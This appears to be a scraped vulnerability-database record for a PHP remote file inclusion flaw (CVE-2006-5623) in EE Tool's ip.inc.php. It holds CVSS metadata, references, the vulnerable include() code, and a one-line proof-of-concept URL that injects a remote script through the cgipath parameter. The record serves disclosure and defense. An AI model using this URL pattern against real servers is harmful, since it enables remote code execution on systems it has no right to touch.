ID OSVDB:33843
Type osvdb
Reporter OSVDB
Modified 2006-10-28T01:47:28
Description
Manual Testing Notes
http://[target]/ip.inc.php?type=1&cgipath=evilscripts
References:
ISS X-Force ID: 29884
Generic Exploit URL: http://milw0rm.com/exploits/2667
FrSIRT Advisory: ADV-2006-4231
CVE-2006-5623
Bugtraq ID: 20780
{"href": "https://vulners.com/osvdb/OSVDB:33843", "id": "OSVDB:33843", "reporter": "OSVDB", "published": "2006-10-28T01:47:28", "description": "## Manual Testing Notes\nhttp://[target]/ip.inc.php?type=1&cgipath=evilscripts\n## References:\nISS X-Force ID: 29884\nGeneric Exploit URL: http://milw0rm.com/exploits/2667\nFrSIRT Advisory: ADV-2006-4231\n[CVE-2006-5623](https://vulners.com/cve/CVE-2006-5623)\nBugtraq ID: 20780\n", "title": "EE Tool ip.inc.php cgipath Variable Remote File Inclusion", "lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "references": [], "edition": 1, "cvelist": ["CVE-2006-5623"], "affectedSoftware": [], "viewCount": 4, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2017-04-28T13:20:30", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5623"]}, {"type": "exploitdb", "idList": ["EDB-ID:2667"]}], "modified": "2017-04-28T13:20:30", "rev": 2}, "vulnersScore": 7.1}, "modified": "2006-10-28T01:47:28"}
{"cve": [{"lastseen": "2020-12-09T19:23:49", "description": "PHP remote file inclusion vulnerability in ip.inc.php in Electronic Engineering Tool (EE Tool) 0.4-1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cgipath parameter.", "edition": 5, "cvss3": {}, "published": "2006-10-31T20:07:00", "title": "CVE-2006-5623", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5623"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:ee_tool:ee_tool:0.4_1"], "id": "CVE-2006-5623", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5623", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ee_tool:ee_tool:0.4_1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T16:46:50", "description": "Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability. CVE-2006-5623. Webapps exploit for php platform", "published": "2006-10-28T00:00:00", "type": "exploitdb", "title": "Electronic Engineering Tool EE TOOL <= 0.4.1 File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5623"], "modified": "2006-10-28T00:00:00", "id": "EDB-ID:2667", "href": "https://www.exploit-db.com/exploits/2667/", "sourceData": "Script Download: http://kent.dl.sourceforge.net/sourceforge/eetool/eetool-0.4-1.tar.gz\n \nCode: if($type == 1) { $url = \"$cgipath\" . \"ipcalc.cgi\"; } else {\n$url = \"$cgipath\" . \"ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2\";\n}nclude(\"$url\");\n \nExploit:www.target.com/ip.inc.php?type=1&cgipath=evilscripts\n \nFound: Cyber-Security\n \nThanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide\n\n# milw0rm.com [2006-10-28]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2667/"}]}
